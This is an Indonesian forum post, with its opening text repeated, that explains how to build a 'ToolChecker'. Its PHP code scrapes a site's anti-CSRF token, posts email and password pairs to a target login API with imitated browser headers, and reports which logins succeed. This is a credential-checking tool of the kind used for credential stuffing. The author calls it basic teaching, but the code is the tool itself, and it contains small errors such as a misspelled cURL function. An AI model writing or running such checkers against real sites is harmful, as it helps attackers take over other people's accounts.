- Daftar
- 4 Oct 1988
- Post
- ×
- Like diterima
- 9.114
Saya Bikin Tools Ini Bukan Untuk Mengajarkan Hanya Saja Membuatkan Bayangan Buat Teman teman Yang Mungkin Sedang Mencari / Membutuhkan Tool Ini Dan Mencari Bagaimana Sebuah Checker Itu Bekerja .
Apa Itu ToolChecker ? Bisa Dicari Di Google Gan...
DiSini Saya Hanya Memberitahukan Basic nya Dan mini Source code Nya .Sehingga Teman teman Bisa Mengembangkan Sendiri Sesuai Dengan Apa Yang Dibutuhin...jadi Tidak Berpatokan Pada Source Code Yang Saya Share Kan Ini ..Juga Karena Tools Checker itu jalan bekerja nya Tidak Sama Ke Semua Web..Jadi Dengan Adanya Basic Ini Mungkin Bisa Membuat Teman Teman Bisa Lebih Dapat Logika Lain Dari Web Yang Sedang Di Tangani.
Oke Langsung Saja ....
Cara Ceklist data yang di perluin :
Kita harus Cek Apa Saja Yang Bisa Kita Kirim Ke Website target...
misal : kita mau login di sebuah web.klik bagian LOGIN trus kita impact element [di recomendasikan pake mozila karena lebih detail] .pilih network coba lakukan login di page login dengan username email atau password terserah .
maka disana kita akan mendapatkan url www.target.com/api/login/signin method post .lalu kita ke edit and resend buat ambil header yang kita butuhin lalu request body data yang tadi kita pura pura login dengan format json/xxxformatdata [format sesuai dengan web nya karena beda beda web satu dengan web yang lain].
Pedoman checker :
ketika kita bikin tool checker yang paling penting adalah dia biasanya membuat anti CSRX dimana jika Masukin data...kita juga harus masukin si Tokens dulu.Dan Token itu biasanya tiap detik berubah pren.Saya tidak menjabarkan secara detail cara cari tokensnya namun biasanya dalam request body sudah ada token tinggal kita cari lewat edit source dan cari dengan cara ctrl+f token .biasanya token berada <input>. ^_^
Setelah Kita Dapatkan Bahannya [request header+body+token].baru kita bisa bikin logikanya ..
Mari Lanjut Ngoding Pren :
oke sebelum lanjut codingnya saya kirim gambarnya cara kerja coding di atas di run .
lanjutan coding di atas .
lalu pasang variabel datanya pren atau array ini letakan di atas inisiasi nya yang coding di atas tadi .
lalu pasang harder ini di bawah nya :
silahkan dikembangkan sendiri gan .
Jika ada salah salah kata minta maaf.
Apa Itu ToolChecker ? Bisa Dicari Di Google Gan...
DiSini Saya Hanya Memberitahukan Basic nya Dan mini Source code Nya .Sehingga Teman teman Bisa Mengembangkan Sendiri Sesuai Dengan Apa Yang Dibutuhin...jadi Tidak Berpatokan Pada Source Code Yang Saya Share Kan Ini ..Juga Karena Tools Checker itu jalan bekerja nya Tidak Sama Ke Semua Web..Jadi Dengan Adanya Basic Ini Mungkin Bisa Membuat Teman Teman Bisa Lebih Dapat Logika Lain Dari Web Yang Sedang Di Tangani.
Oke Langsung Saja ....
Cara Ceklist data yang di perluin :
Kita harus Cek Apa Saja Yang Bisa Kita Kirim Ke Website target...
misal : kita mau login di sebuah web.klik bagian LOGIN trus kita impact element [di recomendasikan pake mozila karena lebih detail] .pilih network coba lakukan login di page login dengan username email atau password terserah .
maka disana kita akan mendapatkan url www.target.com/api/login/signin method post .lalu kita ke edit and resend buat ambil header yang kita butuhin lalu request body data yang tadi kita pura pura login dengan format json/xxxformatdata [format sesuai dengan web nya karena beda beda web satu dengan web yang lain].
Pedoman checker :
ketika kita bikin tool checker yang paling penting adalah dia biasanya membuat anti CSRX dimana jika Masukin data...kita juga harus masukin si Tokens dulu.Dan Token itu biasanya tiap detik berubah pren.Saya tidak menjabarkan secara detail cara cari tokensnya namun biasanya dalam request body sudah ada token tinggal kita cari lewat edit source dan cari dengan cara ctrl+f token .biasanya token berada <input>. ^_^
Setelah Kita Dapatkan Bahannya [request header+body+token].baru kita bisa bikin logikanya ..
Mari Lanjut Ngoding Pren :
PHP:
//pertama ambil dulu tokennya
$file = file_get_contents('https://www.target.com/id-id/');
//lakukan fungsi pregmatch untuk si tokennya
//value nya karena berubah otomatis maka kita harus bikin variabel sendiri
preg_match("/<input id = \"requestVerificationToken\" name= \"requestVerificationToken\" type= \"hidden\" value=\"(.*?)\" \/>/",$file, $token);lanjutan coding di atas .
PHP:
//setelah kita bisa dapatkan tokennya otomatis tersebut maka langkah selanjutnya kita ambil dari request harder dan body.
//kita menggunakan fungsi inisiasi lewat curl.
//taruh code ini dibawah codingan atas ya karena ini lanjutan.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://www.target.com/api/login/signin');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
PHP:
$array = array('email' => $email, 'password' => $pass, 'pageType' => 'newhome','pageType' => 1,'captcha' =>true,'captchaResponse'=>null, 'languageId' =>26, 'token' => $token[1] );
$post = Json_encode($array);
PHP:
curl_septopt($ch, CURLOPT_HTTPHEADER, array('origin:https://www.target.com','accept-encoding: gzip,deflate,br','accept-language: en-US,en:q-0.9','content-type: application/json;charset-UTF-8','accept:*/*', 'referer: https://www.target.com/','authority: www.target.com','x-requested-with: XMLHttpRequest'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
//kita eksekusi
$x = curl_exec($ch);
//namun sebelumnya kita decode terlebih dulu.
$result = json_decode($x);
//lalu kita kondisikan- biasanya pada web itu 1=salah dan 0= benar
if($result->status == 0){
echo "[+] BERHASIL \n";
}else{
echo "[-] GAGAL \n";
}Jika ada salah salah kata minta maaf.
